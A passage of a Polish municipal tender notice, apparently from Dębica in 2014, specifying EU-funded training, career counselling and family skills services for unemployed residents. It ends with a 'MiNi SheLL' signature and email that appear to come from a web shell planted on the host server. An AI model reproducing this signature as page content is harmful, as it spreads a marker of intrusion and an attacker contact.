7) umieszczenie w sali szkoleniowej informacji o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, 

8)  pokrycie kosztów niezbędnych badań lekarskich uczestników szkolenia,

9)  ubezpieczenie od następstw nieszczęśliwych wypadków uczestniczek szkolenia oraz ich dzieci  (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia). 

10) Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, 

11) po  wykonaniu zadania (ukończeniu szkolenia) przedstawia Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, oraz kserokopie wydanych certyfikatów wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia, opinię na temat każdego uczestnika, 



12)  zwrot kosztów przejazdu uczestnika oraz dziecka (jeżeli dotyczy) z miejsca zamieszkania do Dębicy i powrót na podstawie najtańszego środka transportu - cena biletu,

13) W przypadku braku dojazdu do miejsca szkolenia lub gdy szkolenie będzie się odbywać poza terenem Dębicy - Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i powrót oraz dojazd dzieci do miejsca opieki i powrót.  Przewóz dzieci z rodzicami z uzgodnionego miejsca do miejsca odbywania się szkoleń (jeżeli opieka nad dzieckiem odbywać się będzie poza budynkiem szkolenia) oraz przywóz dzieci o określonej porze na zakończenie szkolenia. 
Dopuszcza się możliwość przewozu dzieci z rodzicami z uzgodnionego miejsca do miejsca w którym będzie się odbywać opieka nad dziećmi i dowóz rodziców na miejsce szkolenia, a po zakończeniu szkolenia w danym dniu  przejazd uczestniczek  po dzieci i dowiezienie do uzgodnionego miejsca powrotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs magazyniera z obsługą wózków widłowych dla 1 osoby  ( 1 mężczyzna ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs magazyniera z obsługą wózków widłowych dla 1 osoby 
    ( 1 mężczyzna ) .

    a)  ilość osób do przeszkolenia : 1 osoba (1 mężczyzna) ,
    b)  minimalna liczba godzin szkolenia - 69 godzin dydaktycznych w tym 54 godz. teoretyczne 
         i 15 godz. praktycznych (1 godzina dydaktyczna to 45 minut)
    c)  maksymalny okres trwania szkolenia-  2 tygodnie
    d)  godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
    e)  miejsce realizacji szkolenia - Dębica
    f)   termin realizacji szkolenia :  kwiecień -  30 maj 2014 r.

Wykonawca szkolenia zapewnia :

1)  przeprowadzenie kursu zawodowego magazyniera z obsługą wózków widłowych przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa,
2) salę wykładową, - sprzęt dydaktyczny, - materiały szkoleniowe dla uczestników , - warunki w czasie szkoleń zgodne z przepisami BHP, - wyżywienie: ciastka, kawa, herbata, woda mineralna, ciepły posiłek: drugie danie, - odzież robocza, 
3) umieszczenie w sali szkoleniowej informacji o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki. 
3) pokrycie kosztów niezbędnych badań lekarskich uczestników szkolenia,
4)  ubezpieczenie od następstw nieszczęśliwych wypadków uczestników szkolenia  (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia). 
5) Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
6) po  wykonaniu zadania (ukończeniu szkolenia) przedstawia Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, oraz kserokopie wydanych certyfikatów wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia, opinię na temat każdego uczestnika, 
7) zwrot kosztów przejazdu uczestnika z miejsca zamieszkania do Dębicy i powrót na podstawie najtańszego środka transportu - cena biletu.
8) w przypadku braku dojazdu do miejsca szkolenia lub gdy szkolenie będzie się odbywać poza terenem Dębicy Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i powrót.
10) posiadanie aktualnych, okresowych badań technicznych dla wózków widłowych na których prowadzone jest szkolenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Doradztwo zawodowe dla 26 osób (25 kobiet + 1 mężczyzna).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Doradztwo zawodowe dla 26 osób (25 kobiet + 1 mężczyzna) 

   a)  ilość osób do przeszkolenia - 26 osób (25 kobiet + 1 mężczyzna)
   b)  łączna ilość godzin: 28 godzin
    - doradztwo zawodowe indywidualne w ilości 1 godzina dydaktyczna na 1 osobę przed rozpoczęciem
      szkoleń (1 godzina dydaktyczna to 45 minut)
    - doradztwo zawodowe grupowe (Warsztaty Aktywnego Poszukiwania Pracy ) w ilości 2 godziny
     dydaktyczne na grupę po zakończeniu szkoleń (1 godzina dydaktyczna to 45 minut).
    c) czas trwania szkolenia - przed rozpoczęciem szkoleń 1 godzina dydaktyczna i po zakończeniu
         szkoleń  2 godziny dydaktyczne (1 godzina dydaktyczna to 45 minut)
   d)  godziny realizacji szkolenia - 8.00-19.00 maksymalnie 10 godzin dydaktycznych dziennie
   e)  miejsce realizacji szkolenia - Dębica
   f)  termin realizacji szkolenia :      kwiecień 2014 r.  - doradztwo indywidualne,
                                                       październik -30 listopad 2014 r. - doradztwo grupowe


Celem usługi jest zaktywizowanie osób bezrobotnych poprzez podniesienie świadomości w zakresie mechanizmów rynku pracy, dostarczenie kompetencji zawodowych poszukiwanych na lokalnym rynku pracy a w szczególności ; - kwalifikacja do kursów zawodowych, -podniesienie wiedzy w zakresie mechanizmów i dynamiki rynku pracy, - metody poszukiwania pracy, - zdobycie umiejętności analizy swoich mocnych i słabych stron, -zdobycie umiejętności prowadzenia rozmowy kwalifikacyjnej, -zdobycie umiejętności przygotowania i pisania listu motywacyjnego, życiorysu zawodowego (CV), kwestionariusza osobowego, -poznanie własnych praw związanych z rynkiem pracy.

Wykonawca doradztwa zawodowego zapewnia:

1) sprzęt dydaktyczny, 
2) materiały szkoleniowe dla uczestników ,
3) warunki zgodne z przepisami BHP, 
4) po  wykonaniu zadania przedłożyć Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika. 
Dopuszcza się możliwość wykonania doradztwa zawodowego w budynku Urzędu Gminy w Dębicy na  sali narad   (po wcześniejszym uzgodnieniu terminu) .

Wykonawca gwarantuje wykonanie czynności doradztwa zawodowego przez osobę posiadającą licencję zawodową doradcy zawodowego.
Zamawiający wymaga, aby osoba wykonująca czynności doradztwa zawodowego posiadała minimum licencję doradcy zawodowego pierwszego stopnia (zgodnie z art. 94 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy Dz. U. z 2008 r. Nr 69 poz. 415 z późn.zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Treningi umiejętności psychospołecznych z trenerem rodzinnym dla 7 rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Treningi umiejętności psychospołecznych z trenerem rodzinnym dla 7 rodzin

    a) ilość rodzin do przeprowadzenia treningów : 7 rodzin
    b) czas realizacji - od sierpnia do  października 2014 r.
    c) godziny realizacji - 8.00 - 19.00 maksymalnie 3 godziny dziennie
    d) miejsce realizacji - w miejscu zamieszkania rodzin lub/i w siedzibie Zamawiającego

Trener rodzinny dla 7 rodzin w ilości 10 godzin na 1 rodzinę (indywidualne i grupowe) - łączna ilość godzin: 70 ;
Rodzaj treningów i ilość godzin zostanie przeanalizowana i dopasowana przez trenera rodzinnego w trakcie realizacji pod kątem danej rodziny oraz rodzaju problemów, w związku z czym dopuszczalne jest wykonanie usługi w przeliczeniu na 1 rodzinę zarówno:
 -  1 godzina treningów indywidualnych + 9 godzin treningów grupowych,  
 -   jak i  1 godzina treningów grupowych i 9 godzin treningów indywidualnych.

Celem usługi jest podniesienie kompetencji psychospołecznych rodzin zagrożonych wykluczeniem społecznym a w szczególności:
- trening zastępowania agresji,
- trening radzenia sobie ze stresem,
- trening rozwiązywania sytuacji konfliktowych, 
- trening komunikacji, 
- trening umiejętności wychowawczych dla rodziców, 
- trening autoprezentacji, wizerunku, budowania autorytetu ;

Warsztaty psychospołeczne winny  obejmować:
- podniesienie poziomu motywacji, - samooceny, - poczucia własnej wartości; -poprawy  wizerunku,- poprawy komunikacji interpersonalnej, - kształtowania zachowań asertywnych, - radzenia sobie w sytuacjach problemowych, - budowanie wizerunku , autoprezentacja, budowanie autorytetu, - zarządzanie czasem (sobą w czasie), planowanie, organizowanie.

Wykonawca treningów umiejętności psychospołecznych zapewnia:

  1) sprzęt dydaktyczny, 
  2) materiały szkoleniowe dla uczestników, 
  3) warunki zgodne z przepisami BHP.
  4) po  wykonaniu zadania przedłożyć Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika. 

Wykonawca gwarantuje wykonanie treningów  umiejętności  psychospołecznych przez osobę posiadającą odpowiednie (zgodnie z obowiązującymi przepisami prawa) przygotowanie zawodowe.
Zamawiający wymaga aby osoba wykonująca czynności treningów  umiejętności  psychospołecznych posiadała minimum wykształcenie wyższe w  kierunku:
- pedagogika lub, - psychologia lub,- socjologia lub, - nauki o rodzinie lub, - praca socjalna, 
potwierdzone odpowiednim dyplomem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com